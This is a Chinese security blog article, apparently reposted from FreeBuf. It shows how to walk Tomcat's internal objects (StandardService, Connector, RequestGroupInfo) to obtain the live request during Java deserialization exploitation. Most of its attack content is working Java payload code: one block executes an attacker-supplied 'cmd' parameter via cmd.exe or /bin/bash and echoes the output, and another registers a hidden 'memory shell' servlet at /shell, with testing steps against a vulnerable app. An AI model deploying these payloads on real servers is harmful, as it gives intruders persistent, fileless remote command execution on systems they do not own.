从全局变量寻找到Tomcat回显方式

admin
admin
admin
102340
文章
87
评论
2022年11月26日16:40:27评论10 views字数 8086阅读26分57秒阅读模式

前言

对于回显的获取主要是在ApplicationFilterChain类的lastServicedRequest / lastServicedResponse两个属性,是使用的ThreadLocal进行修饰的,并且,在执行请求的过程中,通过反射修改属性值,能够记录下当前线程的request对象的值。


之后在反序列化利用过程中方便利用ThreadLocal取出对应的request进行内存马的注入关键步骤。


这里转而通过寻找全局存储的request / response进行内存马的注入操作。


正文

如何获取的回显


师傅通过这种方式关注到了org.apache.coyote.AbstractProcessor类中,存在有两个属性值名为request / response分别是使用final修饰的org.apache.coyote.Request / org.apache.coyote.Response类型的变量。


从全局变量寻找到Tomcat回显方式


我们的目标是注入一个内存马,这里以上篇一样的Servlet内存马举例说明。

对于Servlet内存马,我们需要获取到对应ServletContext,但是在org.apache.coyote.Request类中,并没有直接可以获取的方法存在,我们可以关注到该类的setNote方法的实现。


从全局变量寻找到Tomcat回显方式


这个方法是用来存放私有数据的,在其中举了一个例子,其中描述了对于该类的notes数组中的下标为1的位置是用来存放的HttpServletRequest对象的,值得注意的是其中的0-8序号存放的是servlet Container中的数据,9-16序号存放的是connector这个组件的数据。


因为只要获取到了HttpServletRequest对象,也就能够调用getServletContext方法获取我们需要的上下文。


我们可以通过getNote(1)来获取,


好了,言归正传,转到获取request对象,


在一个Controller调用过程中,其中的Http11Processor类是继承了AbstractProcessor这个类的。


从全局变量寻找到Tomcat回显方式


所以我们只需要获取到Http11Processor类对象,我们就能够成功获取到我们需要的request对象


目标放在调用Http11Processor之前是否对该对象进行持久化存储,或者直接点对其中的request对象进行了持久化存储


从全局变量寻找到Tomcat回显方式


我们进而关注到了AbstractProtocol$ConnectionHandler类中,在调用process方法的过程中调用了register方法对processor对象进行了存储。


从全局变量寻找到Tomcat回显方式


传入的是processor,他到底是什么,我们可以追溯到该方法的开头,存在有来源。


从全局变量寻找到Tomcat回显方式


我们可以知道,这个processor对象是获取的是当前的Http11Processor对象,


对于register方法,我们可以跟进一下。


从全局变量寻找到Tomcat回显方式


首先从processor中获取了RequestInfo对象的信息之后调用了setGlobalProcessor方法。


从全局变量寻找到Tomcat回显方式


调用了addRequestProcessor方法进行添加。


从全局变量寻找到Tomcat回显方式


也即是,将其添加进入了processors这个List对象中,


从全局变量寻找到Tomcat回显方式


所以现在我们的目的是获取到AbstractProtocol$ConnectionHandler类的global属性值,也即是获取到AbstractProtocol这个类对象。


在调用这一步之后看起,发现了在CoyoteAdapter#service方法中,存在有Connector对象的操作。


从全局变量寻找到Tomcat回显方式


对于Connector对象


从全局变量寻找到Tomcat回显方式


这是一个connector组件的一个实现,

其中存在有一个protocolHandler属性,是一个ProtocolHandler类对象。


从全局变量寻找到Tomcat回显方式


前面我们需要获取的是AbstractProtocol类对象,同样是实现了这个接口,

而且于HTTP连接相关的类都实现了这个接口的,


从全局变量寻找到Tomcat回显方式


所以我们能够从该属性中获取到我们需要的AbstractProtocol对象值,


现在我们需要获取的对象就是一个Connector对象,


而对于连接器的创建,在tomcat容器进行启动的时候,将会调用setConnector方法将connector放在service中去,也即是StandardService类对象。


对于StandardService的获取,我们可以直接从当前线程中进行获取。


从全局变量寻找到Tomcat回显方式


这样,一条链子进行成了


总结一下:

StandardService==>connector==>Connector.protocolHandler==>Http11NioProtocol.handler==>AbstractProtocol$ConnectionHandler.global==>RequestGroupInfo.processors==>RequestInfo.req


构造回显内存马


非持久化


这种应该也不算是内存马吧,也就是每次发送发序列化数据的时候,通过利用获取的request / response进行命令执行和回显。

对于实验的环境同样使用的是前面一样的环境 -- 使用springboot搭建的环境,


我首先创建了一个getField方法方便获取属性值。


从全局变量寻找到Tomcat回显方式


将具体逻辑放在了static代码块中。


值得注意的有两点


  1. 在进行connector的筛选中,调用了getScheme().toLowerCase().contains("http")方法来帅选和http相关的连接器。


  2. 在命令执行的位置,通过判断有无特征来决定是否执行命令。


    从全局变量寻找到Tomcat回显方式


完整的实现


// 从线程中获取类加载器WebappClassLoaderBase            WebappClassLoaderBase contextClassLoader = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();            // 获取TomcatEmbeddedContext对象            Context context = contextClassLoader.getResources().getContext();            // 从上下文中获取ApplicationContext对象            ApplicationContext applicationContext = (ApplicationContext) getField(context, Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("context"));
            // 从Application中获取StandardService对象            StandardService standardService = (StandardService) getField(applicationContext, Class.forName("org.apache.catalina.core.ApplicationContext").getDeclaredField("service"));
            // 从StandardService中获取Connector数组            Connector[] connectors = standardService.findConnectors();            for (Connector connector : connectors) {                if (connector.getScheme().toLowerCase().contains("http")) {                    // 获取Connector对象的protocolHandler属性值                    ProtocolHandler protocolHandler = connector.getProtocolHandler();                    // 筛选我们需要的Abstract                    if (protocolHandler instanceof AbstractProtocol) {                        // 从Http11NioProtocol对象中获取到handler属性,也即是AbstractProtocol中的handler属性,存在有一个getHandler方法可以直接返回                        // 反射获取该方法                        Method getHandler = Class.forName("org.apache.coyote.AbstractProtocol").getDeclaredMethod("getHandler");                        getHandler.setAccessible(true);                        AbstractEndpoint.Handler handler = (AbstractEndpoint.Handler) getHandler.invoke(protocolHandler);                        // 从上面获取的handler中取出global属性值                        RequestGroupInfo global = (RequestGroupInfo) getField(handler, Class.forName("org.apache.coyote.AbstractProtocol$ConnectionHandler").getDeclaredField("global"));                        // 之后从上面获取的RequestGroupInfo对象中获取到processors这个List对象,元素是RequestInfo对象                        ArrayList processors = (ArrayList) getField(global, Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors"));                        // 遍历List中的元素                        for (Object processor : processors) {                            RequestInfo requestInfo = (RequestInfo) processor;                            // 获取对应的Request对象                            org.apache.coyote.Request req = (org.apache.coyote.Request) getField(requestInfo, Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req"));                            // 通过不同的请求进行处理                            if ((req.queryString()).toString().toLowerCase().contains("cmd")) {                                // 获取对应的Request对象                                org.apache.catalina.connector.Request request = (org.apache.catalina.connector.Request) req.getNote(1);                                // 执行希望执行的命令                                String cmd = request.getParameter("cmd");                                String[] cmds = null;                                if (cmd != null) {                                    if (System.getProperty("os.name").toLowerCase().contains("win")) {                                        cmds = new String[] {"cmd.exe", "/c", cmd};                                    } else {                                        cmds = new String[] {"/bin/bash", "-c", cmd};                                    }                                    java.util.Scanner c = new java.util.Scanner(new ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\A");                                    String o = null;                                    o = c.hasNext() ? c.next() : o;                                    c.close();                                    PrintWriter writer = request.getResponse().getWriter();                                    writer.println(o);                                    writer.flush();                                    writer.close();                                }                            }

右滑动,查看更多

测试一下


首先通过CC6_plus生成序列化数据1.ser


发送给漏洞端。


从全局变量寻找到Tomcat回显方式


在访问路由中添加了一个cmd的GET传参,最后能够发现,成功执行了的。


持久化


对于持久化也就是真正的内存马实现,主要是通过和前面的Tomcat Servlet内存马相结合的模式,


也即是从request对象中获取到了ServletContext对象来执行恶意逻辑。


完整实现


// 从线程中获取类加载器WebappClassLoaderBase            WebappClassLoaderBase contextClassLoader = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();            // 获取TomcatEmbeddedContext对象            Context context = contextClassLoader.getResources().getContext();            // 从上下文中获取ApplicationContext对象            ApplicationContext applicationContext = (ApplicationContext) getField(context, Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("context"));
            // 从Application中获取StandardService对象            StandardService standardService = (StandardService) getField(applicationContext, Class.forName("org.apache.catalina.core.ApplicationContext").getDeclaredField("service"));
            // 从StandardService中获取Connector数组            Connector[] connectors = standardService.findConnectors();            for (Connector connector : connectors) {                if (connector.getScheme().toLowerCase().contains("http")) {                    // 获取Connector对象的protocolHandler属性值                    ProtocolHandler protocolHandler = connector.getProtocolHandler();                    // 筛选我们需要的Abstract                    if (protocolHandler instanceof AbstractProtocol) {                        // 从Http11NioProtocol对象中获取到handler属性,也即是AbstractProtocol中的handler属性,存在有一个getHandler方法可以直接返回                        // 反射获取该方法                        Method getHandler = Class.forName("org.apache.coyote.AbstractProtocol").getDeclaredMethod("getHandler");                        getHandler.setAccessible(true);                        AbstractEndpoint.Handler handler = (AbstractEndpoint.Handler) getHandler.invoke(protocolHandler);                        // 从上面获取的handler中取出global属性值                        RequestGroupInfo global = (RequestGroupInfo) getField(handler, Class.forName("org.apache.coyote.AbstractProtocol$ConnectionHandler").getDeclaredField("global"));                        // 之后从上面获取的RequestGroupInfo对象中获取到processors这个List对象,元素是RequestInfo对象                        ArrayList processors = (ArrayList) getField(global, Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors"));                        // 遍历List中的元素                        for (Object processor : processors) {                            RequestInfo requestInfo = (RequestInfo) processor;                            // 获取对应的Request对象                            org.apache.coyote.Request req = (org.apache.coyote.Request) getField(requestInfo, Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req"));                            org.apache.catalina.connector.Request request = (org.apache.catalina.connector.Request) req.getNote(1);
                            ServletContext servletContext = request.getServletContext();
                            String name = "xxx";                            if (servletContext.getServletRegistration(name) == null) {                                StandardContext o = null;
                                // 从 request 的 ServletContext 对象中循环判断获取 Tomcat StandardContext 对象                                while (o == null) {                                    Field f = servletContext.getClass().getDeclaredField("context");                                    f.setAccessible(true);                                    Object object = f.get(servletContext);
                                    if (object instanceof ServletContext) {                                        servletContext = (ServletContext) object;                                    } else if (object instanceof StandardContext) {                                        o = (StandardContext) object;                                    }                                }
                                //自定义servlet                                Servlet servlet = new TomcatMemshell1();
                                //用Wrapper封装servlet                                Wrapper newWrapper = o.createWrapper();                                newWrapper.setName(name);                                newWrapper.setLoadOnStartup(1);                                newWrapper.setServlet(servlet);
                                //向children中添加Wrapper                                o.addChild(newWrapper);                                //添加servlet的映射                                o.addServletMappingDecoded("/shell", name);

(向右滑动,查看更多)


简单测试一下,


启动反序列漏洞环境,


发送序列化数据,


从全局变量寻找到Tomcat回显方式


成功进行反序列化,


从全局变量寻找到Tomcat回显方式


验证是否成功注入,

从全局变量寻找到Tomcat回显方式

成功创建了一个恶意的Servlet。


Ref:

https://github.com/Litch1-v/ysoserial/blob/master/src/main/java/ysoserial/payloads/util/Gadgets.java

https://xz.aliyun.com/t/7348

从全局变量寻找到Tomcat回显方式



精彩推荐








从全局变量寻找到Tomcat回显方式从全局变量寻找到Tomcat回显方式
从全局变量寻找到Tomcat回显方式
从全局变量寻找到Tomcat回显方式

原文始发于微信公众号(FreeBuf):从全局变量寻找到Tomcat回显方式

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月26日16:40:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   从全局变量寻找到Tomcat回显方式http://cn-sec.com/archives/1426726.html

发表评论

匿名网友 填写信息